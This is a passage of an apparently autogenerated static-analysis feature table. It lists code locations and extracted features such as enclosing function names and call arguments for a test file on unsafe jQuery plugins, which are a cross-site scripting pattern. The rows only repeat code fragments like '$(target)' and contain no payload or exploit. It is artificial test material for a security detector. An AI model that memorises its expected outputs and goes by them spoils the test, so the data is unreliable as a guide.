autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:32:33:42 | "undefined" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:4:34:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:6:34:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:6:34:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:6:34:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:6:34:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:6:34:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:34:6:34:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:4:36:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:6:36:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:6:36:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:6:36:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:6:36:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:6:36:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:36:6:36:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:26 | typeof target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:26 | typeof target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:26 | typeof target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:26 | typeof target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:42 | typeof ... efined" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:42 | typeof ... efined" | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:42 | typeof ... efined" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:7:39:42 | typeof ... efined" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:19 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:19 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:19 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:19 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:26 | target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:26 | target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:26 | target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:14:39:26 | target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:21:39:26 | jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:21:39:26 | jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:21:39:26 | jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:21:39:26 | jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:32:39:42 | "undefined" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:32:39:42 | "undefined" | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:32:39:42 | "undefined" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:39:32:39:42 | "undefined" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:4:40:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:6:40:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:6:40:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:6:40:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:6:40:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:6:40:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:40:6:40:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:4:42:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:6:42:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:6:42:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:6:42:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:6:42:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:6:42:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:42:6:42:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:12 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:12 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:12 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:12 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:19 | target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:19 | target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:19 | target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:7:45:19 | target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:14:45:19 | jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:14:45:19 | jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:14:45:19 | jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:45:14:45:19 | jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:4:46:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:6:46:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:6:46:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:6:46:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:6:46:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:6:46:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:46:6:46:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, 